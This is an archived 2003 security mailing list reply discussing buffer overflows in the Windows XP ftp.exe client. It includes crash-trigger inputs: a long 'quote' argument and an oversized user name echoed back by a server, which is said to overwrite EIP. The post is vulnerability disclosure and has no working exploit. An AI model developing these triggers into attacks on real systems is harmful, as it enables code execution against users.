Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Buffer overflow in Microsoft ftp.exe

From: Frank Knobbe <fknobbe () knobbeits com>
Date: 14 May 2003 00:17:25 -0500
On Wed, 2003-04-30 at 03:34, aT4r InsaN3 wrote:

There is a Buffer overflow in the raw quote command in the Microsoft Windows 
XP ftp.exe

just type:

quote AAAAAAAAA....[517 chars]...AAAAAAAAAAAA
ftp.exe will crash

after several checks i was unable to exploit this vulnerability remotely but 
maybe there are other bugs in the way that ftp.exe manages the buffer of 
server replyes.



Yes, they are, or at least were. A couple years ago we came across a
buffer overflow in the ftp client. If you use the ftp.exe client to log
into an FTP server with a user name >2048 or so, and the server is not a
Microsoft FTP server (used AIX in the test), the ftp client will crash
when the server echo back the long user name.

(sorry, I'm pulling this from memory. I tossed my notes together with
Windows a couple years ago ;) 

For example:
C:> ftp test.host
220 test.host
Name: somethingprettylongbutnottoolonghere
331 user somethingprettylongbutnottoolonghere not found

C:> ftp test.host
Name: somethingverylong+A * 1024 or 2048
331 user somethingverylongAAAA...(up to buffer size, then a pop up
Window with the EIP error...)

If you enter an invalid user name, at some point the server is gonna
echo that user name back to the ftp client. If the user name is too
long, the long echo will overflow the ftp client. The reason this
doesn't work against a Microsoft FTP server is that the MS server will
truncate long user names to prevent buffer overflows. Too bad MS didn't
apply the same idea to the client. An FTP server that echos back a long
user name can overflow the client. It was overwriting EIP which means
that you could execute code, albeit in the context of the user executing
the ftp client.

Since we couldn't come up with a credible scenario to exploit this
remotely, were short on time, and I myself was getting fed up with MS
security anyway, this issue was filed away and forgotten. But I'm sure
MS addressed this issue when they sent their programmers to security
boot camp or at least when they started code reviews/audits....

Regards,
Frank

Attachment: signature.asc
Description: This is a digitally signed message part

Previous By Date Next
Previous By Thread Next

Current thread: